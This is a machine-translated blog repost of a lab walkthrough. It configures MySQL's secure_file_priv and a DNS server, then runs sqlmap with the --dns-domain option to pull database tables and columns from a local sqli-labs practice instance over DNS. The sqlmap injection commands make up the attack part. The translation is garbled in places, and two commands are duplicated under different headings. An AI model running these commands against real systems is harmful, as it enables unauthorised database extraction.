当前位置:网站首页>Reproduce dns out-band data combined with sqlmap

Reproduce dns out-band data combined with sqlmap

2022-08-10 06:33:00 fish pass ruler zz

Set mysql's secure_file_priv attribute

If secure_file_priv is empty, you can read the directory of the disk
If secure_file_priv is D:\, you can read the files in the D disk
If secure_file_priv is null, load_file cannot load files
Add a sentence secure_file_priv=“”
insert image description here
insert image description here

Configure dns server

1.Add role
insert image description here
2.Add positiveFind
insert image description here
3. New host
IP addressFor the ip address of the virtual machine where sqlmap is located
Insert image description here
Create aPan analysis
Insert image description here
Use virtual machine ping just set on the server, and enter tcpdump -n port 53 in kali; check the information returned.
insert image description here
insert image description here
4. Create conditional repeater
insert image description here

SQLMap uses out-of-band dns injection

Fetch library

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables

insert image description here
Get table

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables

insert image description here
Get Columns

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns

insert image description here

原网站

版权声明
本文为[fish pass ruler zz]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/222/202208100547536332.html

边栏推荐

猜你喜欢

随机推荐